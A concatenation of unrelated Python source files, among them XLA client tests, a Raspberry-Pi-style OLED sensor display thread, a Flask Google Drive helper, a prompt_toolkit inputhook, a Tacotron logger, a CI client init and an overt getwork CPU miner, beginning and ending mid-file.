padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed[0])), 0)
compiled_c = c.Build().Compile()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = xla_client.execute_with_python_values(compiled_c)
self.assertEqual(result, item)
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed)), 0)
compiled_c = c.Build().Compile()
xla_client.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(compiled_c)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = c.Infeed(xla_client.shape_from_pyval(to_round_trip[0]))
x = c.GetTupleElement(x_and_token, 0)
token = c.GetTupleElement(x_and_token, 1)
c.Outfeed(x, token)
compiled_c = c.Build().Compile()
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.Execute([]))
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.shape_from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
c.Scatter(
c.Constant(a), c.Constant(scatter_indices), c.Constant(updates),
self._CreateBinaryAddS32Computation(), dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]], dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=expected)
class ErrorTest(ComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return c.Build().Compile(compile_options=options)
self.assertRaisesRegexp(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
def TestFun():
return xla_client.execute_with_python_values(c.Build().Compile(),
[self.f32_scalar_2])
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).Compile()
ans = xla_client.execute_with_python_values(compiled_c, [arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
absltest.main()
|
oled_thread.py
|
import threading
from threading import Lock,Thread
import time,os
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from io import BytesIO
from ctypes import *
import time
import platform
from oled import *
#import numba as nb
from bme680 import *
import globalvar
oled_lock = Lock()
OLED_SizeX = 128
OLED_SizeY = 64
oled_img = Image.new("1",(OLED_SizeX, OLED_SizeY),"white")
oled_draw = ImageDraw.Draw(oled_img)
#@nb.jit()
def convert(pixels, buf):
for y in range(0, 64):
for x in range(0, 128):
pixel = pixels[x + y*128]
if pixel == 0 :
pixel = 1
else:
pixel = 0
pixel = pixel << (y % 8)
index = int(int(y / 8) * OLED_SizeX + x)
buf[index] |= pixel
def oled_thread():
frqs = []
frq_avg = 0
sum_size = 10
if platform.system() == "Windows":
oled_font = ImageFont.truetype('C:\\WINDOWS\\Fonts\\segoesc.ttf',13) #14 is font size # simsun.ttc
elif platform.system() == "Linux":
oled_font = ImageFont.truetype('NotoSansCJK-Regular.ttc',13) # 'fc-list :lang=zh' command look for Chinese fonts
elif platform.system() == "Darwin":
oled_font = ImageFont.truetype('/System/Library/AssetsV2/com_apple_MobileAsset_Font6/00e58c0676b9e589e9309dbca4b795bbba3b5420.asset/AssetData/Kaiti.ttc',13) # brew install fontconfig than 'fc-list :lang=zh' command look for Chinese fonts
else:
oled_font = ImageFont.truetype('simsun.ttc', 13)
msg = "LUCERO"
w, h = oled_draw.textsize(msg)
oled_draw.text(((OLED_SizeX-w)/2 - 10,0), msg, font=oled_font)
oled_draw.text((OLED_SizeX - 12,7), "Hz")
if platform.system() == "Windows":
oled_font = ImageFont.truetype('simsun.ttc',11)
xstart = 10
elif platform.system() == "Linux":
oled_font = ImageFont.truetype('NotoSansCJK-Regular.ttc',9)
xstart = 25
elif platform.system() == "Darwin":
oled_font = ImageFont.truetype('/System/Library/AssetsV2/com_apple_MobileAsset_Font6/ec2979c8550757993101e27b30b2b89cb45917fc.asset/AssetData/Yuanti.ttc',10)
xstart = 15
else:
xstart = 15
while True:
start = time.perf_counter()
# start1 = time.perf_counter()
oled_tmpbuf = (c_byte * (128*8))()
oled_lock.acquire()
pixels = list(oled_img.getdata())
oled_lock.release()
convert(pixels, oled_tmpbuf)
elapsed1 = (time.perf_counter() - start)
#logger.debug("%d ms", (int)(elapsed1*1000))
OLED_Fill(oled_tmpbuf)
elapsed = (time.perf_counter() - start)
frq = 1 / elapsed
frqs.append(frq)
frq_avg = sum(frqs) / len(frqs)
if len(frqs) > sum_size:
frqs.pop(0)
tmpstr = "{:f}".format(frq_avg)
tmpstr = tmpstr[:4]
#logger.debug("%02.1f Hz", frq_avg)
oled_lock.acquire()
oled_draw.rectangle((OLED_SizeX - 24,0,127,8),fill ='white') #frequency
oled_draw.text((OLED_SizeX - 24,0), tmpstr)
BME680_lock.acquire()
temp = globalvar.get_value('BME680_Temperature')
hum = globalvar.get_value('BME680_Humidity')
press = globalvar.get_value('BME680_Pressure')
aqi = globalvar.get_value('BME680_AQI')
BME680_lock.release()
if temp != None and hum != None and press != None and aqi != None:
oled_draw.rectangle((0, 18,127,63),fill ='white') # data region
msg = u"温度: {:.2f} ℃".format(temp)
oled_draw.text((xstart, OLED_SizeY - 47), msg, font=oled_font)
msg = u"湿度: {:.2f} % RH".format(hum)
oled_draw.text((xstart, OLED_SizeY - 35), msg, font=oled_font)
msg = u"气压: {:.3f} kPa".format(press)
oled_draw.text((xstart, OLED_SizeY - 23), msg, font=oled_font)
msg = u"AQI: {:.2f}".format(aqi)
# 根据《环境空气质量指数(AQI)技术规定(试行)》(HJ 633—2012)规定
if aqi == 0:
msg += ' Burn in'
elif aqi <= 50:
msg += u' 优'
elif aqi <= 100:
msg += u' 良'
elif aqi <= 150:
msg += u' 轻度'
elif aqi <= 200:
msg += u' 中度'
elif aqi <= 300:
msg += u' 重度'
else:
msg += u' 严重'
oled_draw.text((xstart + 4, OLED_SizeY - 11), msg, font=oled_font)
oled_lock.release()
def oled_thread_start():
t1=Thread(target=oled_thread)
t1.setDaemon(True)
t1.start()
|
flask_gdrive.py
|
from __future__ import print_function
import pickle
import os.path
import threading
import time
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from flask import current_app, _app_ctx_stack, Response, url_for
class GDriveMain:
"""Base class for using Google Drive api"""
#constructor
def __init__(self, app, creds, token, *args):
self.app = app
self.folder_id = ""
if app is not None:
app.config.setdefault('GDRIVE_CREDENTIALS_URI', creds)
app.config.setdefault('GDRIVE_TOKEN_URI', token)
self.init_app(app, *args)
def init_app(self, app, *args):
pass
#To be implemented separately.
#connect function establish the cred
def connect(self):
SCOPES = [ #List of Requesting server of Google
'https://www.googleapis.com/auth/drive.readonly',
'https://www.googleapis.com/auth/spreadsheets'
]
creds = None
"""
GDRIVE_TOKEN_URI stores token.pickle file and it is use to stores the user's access and refresh tokens,
and is created automatically when the authorization flow completes for the first
time.
"""
if os.path.exists(current_app.config['GDRIVE_TOKEN_URI']):
with open(current_app.config['GDRIVE_TOKEN_URI'], 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
current_app.config['GDRIVE_CREDENTIALS_URI'], SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(current_app.config['GDRIVE_TOKEN_URI'], 'wb') as token:
pickle.dump(creds, token)
return creds
class GDriveStatic(GDriveMain):
"""
GDrive Static is Content handler
It will fetch all the dynamic content from GDrive
"""
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'gdrive_service'):
ctx.gdrive_service = None
def init_app(self, app, *args):
remote_folder = args[0]
app.config.setdefault('GDRIVE_STATIC_FOLDER', remote_folder)
app.teardown_appcontext(self.teardown)
@property
def gdrive_service(self):
ctx = _app_ctx_stack.top
if ctx is not None:
if not hasattr(ctx, 'gdrive_service'):
creds = self.connect()
service = build('drive', 'v3', credentials=creds)
result = service.files().list(
pageSize=1, fields='nextPageToken, files(id, mimeType)', q="name='{}'".format(current_app.config['GDRIVE_STATIC_FOLDER'])).execute()
items = result.get('files', [])
if not items:
raise IOError("Folder not found in Google Drive")
else:
self.folder_id = items[0]['id']
ctx.gdrive_service = service
print(self.folder_id)
return ctx.gdrive_service
def fileHandler(self, fpath):
name, ext = os.path.splitext(fpath)
doc_mimetypes = {
'.html': 'text/html',
'.txt': 'text/plain',
}
other_mimetypes = {
'.pdf': 'application/pdf',
'.jpeg': 'image/jpeg',
'.jpg': 'image/jpeg',
'.png': 'image/png',
'.svg': 'image/svg'
}
results = self.gdrive_service.files().list(
pageSize=1, fields="nextPageToken, files(id, mimeType)", q=f"name='{fpath}' and '{self.folder_id}' in parents").execute()
items = results.get('files', [])
if not items:
raise IOError('File Not Found')
else:
file_id = items[0]['id']
if ext in doc_mimetypes:
res = self.gdrive_service.files().export_media(fileId=file_id,
mimeType=doc_mimetypes[ext]).execute()
return res, 200
else:
res = self.gdrive_service.files().get_media(fileId=file_id).execute()
try:
return Response(res, mimetype=other_mimetypes[ext])
except:
return res, 200
def g_url_for(self, fpath):
return url_for('fileHandler', fpath=fpath)
class GDriveDB(GDriveMain):
"""
Database handler class
send and fetch data from Google docs store in our file
"""
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'gdrive_db'):
ctx.gdrive_service = None
def init_app(self, app, *args):
self.remote_sheets = args[0]
self.RANGE = 'A1:Z'
if len(args) > 1:
cache_update = args[1]
else:
cache_update = 0
# app.config.setdefault('GDRIVE_DB_ID', remote_sheet)
self.cache_update_time = cache_update
app.teardown_appcontext(self.teardown)
@property
def gdrive_db(self):
ctx = _app_ctx_stack.top
if ctx is not None:
if not hasattr(ctx, 'gdrive_db'):
creds = self.connect()
service = build('sheets', 'v4', credentials=creds)
sheet = service.spreadsheets()
self.global_values = dict()
for s in self.remote_sheets:
result = sheet.values().get(spreadsheetId=self.remote_sheets[s], range=self.RANGE).execute()
values = result.get('values', [])
if not values:
raise IOError("Sheet not found")
else:
self.global_values[s] = values
ctx.gdrive_db = self.global_values
self.sheet = sheet
# self.update_thread = threading.Thread(target=lambda: self.update_cache())
# self.update_thread.start()
return ctx.gdrive_db
def update(self, sheet_name):
result = self.sheet.values().update(
spreadsheetId=self.remote_sheets[sheet_name], range=self.RANGE,
body={'values': self.global_values[sheet_name]}, valueInputOption="RAW").execute()
# def update_cache(self):
# time.sleep(self.cache_update_time)
# print("Updating cache")
# #TODO
|
inputhook.py
|
"""
Similar to `PyOS_InputHook` of the Python API, we can plug in an input hook in
the asyncio event loop.
The way this works is by using a custom 'selector' that runs the other event
loop until the real selector is ready.
It's the responsibility of this event hook to return when there is input ready.
There are two ways to detect when input is ready:
The inputhook itself is a callable that receives an `InputHookContext`. This
callable should run the other event loop, and return when the main loop has
stuff to do. There are two ways to detect when to return:
- Call the `input_is_ready` method periodically. Quit when this returns `True`.
- Add the `fileno` as a watch to the external eventloop. Quit when file descriptor
becomes readable. (But don't read from it.)
Note that this is not the same as checking for `sys.stdin.fileno()`. The
eventloop of prompt-toolkit allows thread-based executors, for example for
asynchronous autocompletion. When the completion for instance is ready, we
also want prompt-toolkit to gain control again in order to display that.
"""
import asyncio
import os
import select
import selectors
import threading
from asyncio import AbstractEventLoop, get_event_loop
from selectors import BaseSelector
from typing import Callable
from prompt_toolkit.utils import is_windows
__all__ = [
'set_eventloop_with_inputhook',
'InputHookSelector',
'InputHookContext',
]
def set_eventloop_with_inputhook(
inputhook: Callable[['InputHookContext'], None]) -> AbstractEventLoop:
"""
Create a new event loop with the given inputhook, and activate it.
"""
selector = InputHookSelector(selectors.DefaultSelector(), inputhook)
loop = asyncio.SelectorEventLoop(selector) # type: ignore
asyncio.set_event_loop(loop)
return loop
class InputHookSelector(BaseSelector):
"""
Usage:
selector = selectors.SelectSelector()
loop = asyncio.SelectorEventLoop(InputHookSelector(selector, inputhook))
asyncio.set_event_loop(loop)
"""
def __init__(self, selector: BaseSelector, inputhook: Callable[['InputHookContext'], None]) -> None:
self.selector = selector
self.inputhook = inputhook
self._r, self._w = os.pipe()
def register(self, fileobj, events, data=None):
return self.selector.register(fileobj, events, data=data)
def unregister(self, fileobj):
return self.selector.unregister(fileobj)
def modify(self, fileobj, events, data=None):
return self.selector.modify(fileobj, events, data=None)
def select(self, timeout=None):
# If there are tasks in the current event loop,
# don't run the input hook.
if len(get_event_loop()._ready) > 0:
return self.selector.select(timeout=timeout)
ready = False
result = None
# Run selector in other thread.
def run_selector() -> None:
nonlocal ready, result
result = self.selector.select(timeout=timeout)
os.write(self._w, b'x')
ready = True
th = threading.Thread(target=run_selector)
th.start()
def input_is_ready() -> bool:
return ready
# Call inputhook.
# The inputhook function is supposed to return when our selector
# becomes ready. The inputhook can do that by registering the fd in its
# own loop, or by checking the `input_is_ready` function regularly.
self.inputhook(InputHookContext(self._r, input_is_ready))
# Flush the read end of the pipe.
try:
# Before calling 'os.read', call select.select. This is required
# when the gevent monkey patch has been applied. 'os.read' is never
# monkey patched and won't be cooperative, so that would block all
# other select() calls otherwise.
# See: http://www.gevent.org/gevent.os.html
# Note: On Windows, this is apparently not an issue.
# However, if we would ever want to add a select call, it
# should use `windll.kernel32.WaitForMultipleObjects`,
# because `select.select` can't wait for a pipe on Windows.
if not is_windows():
select.select([self._r], [], [], None)
os.read(self._r, 1024)
except OSError:
# This happens when the window resizes and a SIGWINCH was received.
# We get 'Error: [Errno 4] Interrupted system call'
# Just ignore.
pass
# Wait for the real selector to be done.
th.join()
return result
def close(self) -> None:
"""
Clean up resources.
"""
if self._r:
os.close(self._r)
os.close(self._w)
self._r = self._w = -1
self.selector.close()
def get_map(self):
return self.selector.get_map()
class InputHookContext:
"""
Given as a parameter to the inputhook.
"""
def __init__(self, fileno: int, input_is_ready: Callable[[], bool]) -> None:
self._fileno = fileno
self.input_is_ready = input_is_ready
def fileno(self) -> int:
return self._fileno
|
infolog.py
|
import atexit
import json
from datetime import datetime
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a')
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new {} training run\n'.format(run_name))
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
def log(msg, end='\n', slack=False):
print(msg, end=end)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
|
__init__.py
|
"""
Copyright (c) 2015 Michael Bright and Bamboo HR LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import os
import threading
import time
try:
import simplejson as json
except ImportError:
import json
from flask import Flask
from rapid.lib import is_primary_worker, setup_logging, setup_status_route
from .parsers import load_parsers
from ..lib import setup_config_from_file
from .communicator.client_communicator import ClientCommunicator
from .controllers import register_controllers
app = Flask("rapidci_client")
app.rapid_config = {'_is': 'client'}
logger = logging.getLogger("rapid")
@app.errorhandler(500)
def internal_error(exception):
response = json.dumps(exception.to_dict())
response.status_code = exception.status_code
response.content_type = 'application/json'
return response
def setup_logger(flask_app):
setup_logging(flask_app)
def load_extensions(flask_app):
from rapid.lib.framework.ioc import IOC
from rapid.extensions.extension_loader import ExtensionLoader
extension_loader = IOC.get_class_instance(ExtensionLoader)
extension_loader.load_extensions(flask_app)
def configure_application(flask_app, args):
setup_status_route(flask_app)
setup_config_from_file(flask_app, args)
setup_logger(flask_app)
load_parsers()
register_controllers(flask_app)
if is_primary_worker() and not args.run and not args.upgrade:
setup_client_register_thread()
clean_workspace()
if args.mode_logging:
from rapid.lib.log_server import LogServer
log_server = LogServer(args.log_dir)
log_server.configure_application(flask_app)
load_extensions(flask_app)
def clean_workspace():
try:
import shutil
if os.path.isdir(app.rapid_config.workspace): # pylint: disable=no-member
shutil.rmtree(app.rapid_config.workspace) # pylint: disable=no-member
os.mkdir(app.rapid_config.workspace) # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
pass
def _registration_thread():
communicator = ClientCommunicator(app.rapid_config.master_uri, app.rapid_config.quarantine_directory, app, app.rapid_config.verify_certs) # pylint: disable=no-member
while True:
communicator.register(app.rapid_config)
time.sleep(app.rapid_config.registration_rate) # pylint: disable=no-member
def setup_client_register_thread():
logger.info("Setting up client register thread")
thread = threading.Thread(target=_registration_thread)
thread.daemon = True
thread.start()
def run_action_instance(action_instance_id):
# type: (int) -> None
from rapid.client.action_instance_runner import ActionInstanceRunner
runner = ActionInstanceRunner(app.rapid_config)
runner.run_action_instance(app, action_instance_id)
def upgrade_rapid():
from rapid.client.client_upgrader import ClientUpgrader
upgrader = ClientUpgrader(app.rapid_config)
upgrader.upgrade(app)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Girauno developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class GiraunoRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = GiraunoRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 4142
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
inference_slide.py
|
import os
import sys
import numpy as np
import argparse
from datetime import datetime
#torch related
import torch
from torch.utils.data import DataLoader
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from torchvision import datasets, transforms
import torch.multiprocessing as mp
import torch.nn.init as init
from config import config
from network import MultiLabelDataset, Net
from triplet_network import Network, TripletNet
from adam_base import Adam
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"]=config.gpu
use_cuda = torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
DATASET = ['wiki10', 'amz13k','amz630k','deli']
DATAPATH_TRAIN = {'wiki10': "/home/bc20/NN/structured_matrix/wiki10_train.txt",
'amz13k': "/home/bc20/NN/structured_matrix/amazonCat_train.txt",
'amz630k': "/home/bc20/NN/structured_matrix/amazon_shuf_train",
'deli':"/home/zl71/data/deliciousLarge_shuf_train.txt",
'wiki300': "/home/bc20/NN/data/wikiLSHTC_shuf_train.txt"}
DATAPATH_TEST = {'wiki10': "/home/bc20/NN/structured_matrix/wiki10_test.txt",
'amz13k': "/home/bc20/NN/structured_matrix/amazonCat_test.txt",
'amz630k': "/home/bc20/NN/structured_matrix/amazon_shuf_test",
'deli':"/home/zl71/data/deliciousLarge_shuf_test.txt",
'wiki300': "/home/bc20/NN/data/wikiLSHTC_shuf_test.txt"}
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type = str, default = "deli", choices = DATASET)
parser.add_argument('--K', type = int, default = 11) #13 wiki: 5 deli:10
parser.add_argument('--L',type = int, default = 10) # wiki: 5
parser.add_argument('--rebuild_freq',type = int, default = 30)
parser.add_argument('--epoch_num', type=int, default=30)
